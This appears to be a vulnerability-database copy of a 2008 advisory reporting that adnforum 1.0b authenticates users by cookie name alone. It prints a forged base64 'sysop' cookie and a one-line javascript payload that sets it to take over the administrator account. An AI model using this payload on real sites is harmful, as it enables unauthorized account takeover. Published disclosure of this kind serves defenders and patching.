Lucene search

K

adnforums-insecure.txt

๐Ÿ—“๏ธย 24 Sep 2008ย 00:00:00Reported byย PepeluxTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 18ย Views

Insecure cookie handling vulnerability in adnforum version <= 1.0b allows cookie spoofing.

Show more
Code
`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
adnforum <= 1.0b / Insecure Cookie Handling Vulnerability   
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
  
$ Program: adnforum  
$ Version: <= 1.0b  
$ File affected: index.php  
$ Download: http://sourceforge.net/projects/adnforum/  
  
  
Found by Pepelux <pepelux[at]enye-sec.org>  
eNYe-Sec - www.enye-sec.org  
  
  
Cookie is base64 based and the ascii format used is:  
user:23ed4e45887ad4311ff654bd4aab6540:user:0  
user:md5 pass:user:0  
  
Programmer forgot to check the pass and only use the nick to autenticate  
the user.  
  
You can create a fake cookie likes this:  
sysop:000000000000000000000000000000:sysop:0  
  
In base64: c3lzb3A6MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwOnN5c29wOjA  
  
Exploit:  
javascript:document.cookie = "fpusuario=c3lzb3A6MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwOnN5c29wOjA"`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo